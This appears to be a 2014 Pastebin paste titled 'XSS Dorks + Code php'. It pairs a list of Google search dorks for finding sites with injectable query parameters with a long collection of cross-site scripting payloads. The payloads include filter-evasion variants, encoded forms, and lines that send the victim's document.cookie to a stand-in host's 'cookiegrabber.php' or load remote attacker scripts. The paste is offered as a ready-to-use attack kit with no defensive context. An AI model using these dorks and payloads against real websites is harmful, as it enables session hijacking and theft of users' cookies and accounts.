API tools faq
paste
Advertisement
MasoqFellipe

XSS Dorks + Code php

MasoqFellipe
Jan 26th, 2014
898
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.70 KB | None | 0 0
raw download clone embed print report
  1. +-------------------------------------------------------------------------------------------------------------------
  2. # Dorks XSS
  3. inurl:search.php?
  4. inurl:find.php?
  5. inurl:search.html
  6. inurl:find.html
  7. inurl:search.aspx
  8. inurl:find.aspx
  9. inurl:".php?cmd="
  10. inurl:".php?z="
  11. inurl:".php?q="
  12. inurl:".php?search="
  13. inurl:".php?query="
  14. inurl:".php?searchstring="
  15. inurl:".php?keyword="
  16. inurl:".php?file="
  17. inurl:".php?years="
  18. inurl:".php?txt="
  19. inurl:".php?tag="
  20. inurl:".php?max="
  21. inurl:".php?from="
  22. inurl:".php?author="
  23. inurl:".php?pass="
  24. inurl:".php?feedback="
  25. inurl:".php?mail="
  26. inurl:".php?cat="
  27. inurl:".php?vote="
  28. inurl:search.php?q=
  29. inurl:com_feedpostold/feedpost.php?url=
  30. inurl:scrapbook.php?id=
  31. inurl:headersearch.php?sid=
  32. inurl:/poll/default.asp?catid=
  33. inurl:/search_results.php?search=
  34. inurl:com_feedpostold/feedpost.php?url=
  35. inurl:/products/orkutclone/scrapbook.php?id=
  36. inurl:/products/classified/headersearch.php?sid=
  37. inurl:/poll/default.asp?catid=
  38. inurl:/search_results.php?search=Search&k=
  39. /preaspjobboard//Employee/emp_login.asp?msg1=
  40. pages/match_report.php?mid= pages/match_report.php?mid=
  41. /notice.php?msg= /notice.php?msg=
  42. /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
  43. /index.php?option=com_easygb&Itemid=
  44. /2wayvideochat/index.php?r=
  45. /view.php?PID= /view.php?PID=
  46. /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
  47. /showproperty.php?id= /showproperty.php?id=
  48. /vehicle/buy_do_search/?order_direction=
  49. /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
  50. /winners.php?year=2008&type= /winners.php?year=2008&type=
  51. /schoolmv2/html/studentmain.php?*******=
  52. /site_search.php?sfunction= /site_search.php?sfunction=
  53. /search.php?search_keywords= /search.php?search_keywords=
  54. /hexjector.php?site= /hexjector.php?site=
  55. /news.php?id= /news.php?id=
  56. /index.php?view=help&faq=1&ref=
  57. inurl:"contentPage.php?id="
  58. inurl:"displayResource.php?id="
  59. intext:"Website by Mile High Creative"
  60. /index.php?option=com_reservations&task=askope&nidser=2&namser="com_reservations"
  61. /info.asp?page=fullstory&key=1&news_type=news&onvan=
  62. /ser/parohija.php?id= /ser/parohija.php?id=
  63. /strane/pas.php?id= /strane/pas.php?id=
  64. /main.php?sid= /main.php?sid=  
  65. +-------------------------------------------------------------------------------------------------------------------
  66. +-------------------------------------------------------------------------------------------------------------------
  67. # Code Php
  68.  
  69. '';!--"<XSS>=&{()}
  70.  
  71. '>//\\,<'>">">"*"
  72.  
  73. '); alert('XSS
  74.  
  75. <script>alert(1);</script>
  76.  
  77. <script>alert('XSS');</script>
  78.  
  79. <IMG SRC="javascript:alert('XSS');">
  80.  
  81. <IMG SRC=javascript:alert('XSS')>
  82.  
  83. <IMG SRC=JaVaScRiPt:alert('XSS')>
  84.  
  85. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  86.  
  87. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  88.  
  89. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  90.  
  91. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  92.  
  93. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  94.  
  95. <script>alert(String.fromCharCode(88,83,83))</script>
  96.  
  97. <img src=foo.png onerror=alert(/xssed/) />
  98.  
  99. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  100.  
  101. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  102.  
  103. <marquee><script>alert('XSS')</script></marquee>
  104.  
  105. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  106.  
  107. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  108.  
  109. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  110.  
  111. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  112.  
  113. "><script>alert(0)</script>
  114.  
  115. <script src=http://yoursite.com/your_files.js></script>
  116.  
  117. </title><script>alert(/xss/)</script>
  118.  
  119. </textarea><script>alert(/xss/)</script>
  120.  
  121. <IMG LOWSRC=\"javascript:alert('XSS')\">
  122.  
  123. <IMG DYNSRC=\"javascript:alert('XSS')\">
  124.  
  125. <font style='color:expression(alert(document.cookie))'>
  126.  
  127. <img src="javascript:alert('XSS')">
  128.  
  129. <script language="JavaScript">alert('XSS')</script>
  130.  
  131. <body onunload="javascript:alert('XSS');">
  132.  
  133. <body onLoad="alert('XSS');"
  134.  
  135. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  136.  
  137. "/></a></><img src=1.gif onerror=alert(1)>
  138.  
  139. window.alert("Bonjour !");
  140.  
  141. <div style="x:expression((window.r==1)?'':eval('r=1;
  142.  
  143. alert(String.fromCharCode(88,83,83));'))">
  144.  
  145. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  146.  
  147. "><script alert(String.fromCharCode(88,83,83))</script>
  148.  
  149. '>><marquee><h1>XSS</h1></marquee>
  150.  
  151. '">><script>alert('XSS')</script>
  152.  
  153. '">><marquee><h1>XSS</h1></marquee>
  154.  
  155. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  156.  
  157. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  158.  
  159. <script>var var = 1; alert(var)</script>
  160.  
  161. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  162.  
  163. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  164.  
  165. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  166.  
  167. " onfocus=alert(document.domain) "> <"
  168.  
  169. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  170.  
  171. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  172.  
  173. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  174.  
  175. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  176.  
  177. <br size=\"&{alert('XSS')}\">
  178.  
  179. <scrscriptipt>alert(1)</scrscriptipt>
  180.  
  181. </br style=a:expression(alert())>
  182.  
  183. </script><script>alert(1)</script>
  184.  
  185. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  186.  
  187. [color=red width=expression(alert(123))][color]
  188.  
  189. <BASE HREF="javascript:alert('XSS');//">
  190.  
  191. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  192.  
  193. "></iframe><script>alert(123)</script>
  194.  
  195. <body onLoad="while(true) alert('XSS');">
  196.  
  197. '"></title><script>alert(1111)</script>
  198.  
  199. </textarea>'"><script>alert(document.cookie)</script>
  200.  
  201. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  202.  
  203. </script></script><<<<script><>>>><<<script>alert(123)</script>
  204.  
  205. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  206.  
  207. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  208.  
  209. '></select><script>alert(123)</script>
  210.  
  211. '>"><script src = 'http://www.site.com/XSS.js'></script>
  212.  
  213. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  214.  
  215. <SCRIPT>document.write("XSS");</SCRIPT>
  216.  
  217. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  218.  
  219. ='><script>alert("xss")</script>
  220.  
  221. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  222.  
  223. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  224.  
  225. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  226.  
  227. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  228.  
  229. src="http://www.site.com/XSS.js"></script>
  230.  
  231. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  232.  
  233. !--" /><script>alert('xss');</script>
  234.  
  235. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  236.  
  237. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  238.  
  239. '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  240.  
  241. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  242.  
  243. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  244.  
  245. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  246.  
  247. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  248.  
  249. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  250. +-------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!